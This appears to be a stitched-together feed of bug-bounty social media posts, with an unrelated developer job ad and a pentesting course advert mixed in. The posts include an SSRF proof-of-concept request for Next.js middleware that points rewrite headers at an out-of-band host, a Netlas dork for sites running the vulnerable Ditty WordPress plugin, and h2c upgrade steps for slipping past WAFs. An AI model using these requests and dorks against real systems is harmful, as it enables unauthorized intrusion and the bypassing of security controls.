Hey Hunter's,
DarkShadow here back again, just dropping a list of queries.

30K+ Search Queries 🚀
(Google | Shodan | FOFA)

For hunters, red teamers & OSINT warriors:

⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision

GitHub →https://github.com/projectdiscovery/awesome-search-queries

Show your love Guy's ❤️

#bugbountytips #osint

We’re looking for a talented Full Stack Developer with strong MERN stack skills and hands-on experience in cloud deployment, CI/CD, DevOps, and DevSecOps.

What you’ll do:

1. Build and maintain frontend & backend applications
2. Deploy to cloud (AWS/Azure/GCP)
3. Set up and manage CI/CD pipelines
4. Implement DevOps & DevSecOps best practices


What we’re looking for:

1. MERN stack expertise (MongoDB, Express, React, Node)
2. Cloud deployment experience
3. CI/CD, Docker/Kubernetes knowledge
4. Familiarity with DevOps & DevSecOps principles


Experience required:

1. Minimum 1-2 years in IT infrastructure management, development and implementation.
2. Also expertise in git & github actions

✅Send Resume [email protected]

📍Remote, Preferably Kolkata, India 🇮🇳

A fresh Web Pentesting batch with a Bug Bounty approach is starting this week.

📱 If you're interested DM on whatsapp- wa.link/brutsecurity

CVE-2025-8085: SSRF in Ditty WordPress plugin, 8.6 rating❗️

The vulnerability allows attackers without authentication to make requests to arbitrary URLs.

Search at Netlas.io:
👉 Link: https://nt.ls/HthP0
👉 Dork: http.body:"plugins/ditty-news-ticker"

Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/

Hey Hunter's,
DarkShadow here back again, dropping a critical SSRF 💥

Nextjs SSRF in Middleware header!
✅POC:

GET / HTTP/1.1
Host: target. com
Location: https://oast. me
X-Middleware-Rewrite: https://oast. me

If you guy's really enjoy to read, then show your love and follow me x.com/darkshadow2bd

#ssrf #bugbountytips

Hey Hunter's,
DarkShadow here back again!

Check your burp isn't this feature is enable?

Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.

#bugbountytips #burp

🪲 Bug Bounty Pro Tip: #H2C Upgrade Bypass

Target: Applications using HTTP/2 Cleartext (h2c) upgrades.

The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.

How to Test:

1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).

2. Send an initial HTTP/1.1 request with the upgrade header:

GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade

3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.

4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.

Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.

#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2

⚡Sn1per - Automate your recon like never before!

✅ https://github.com/1N3/Sn1per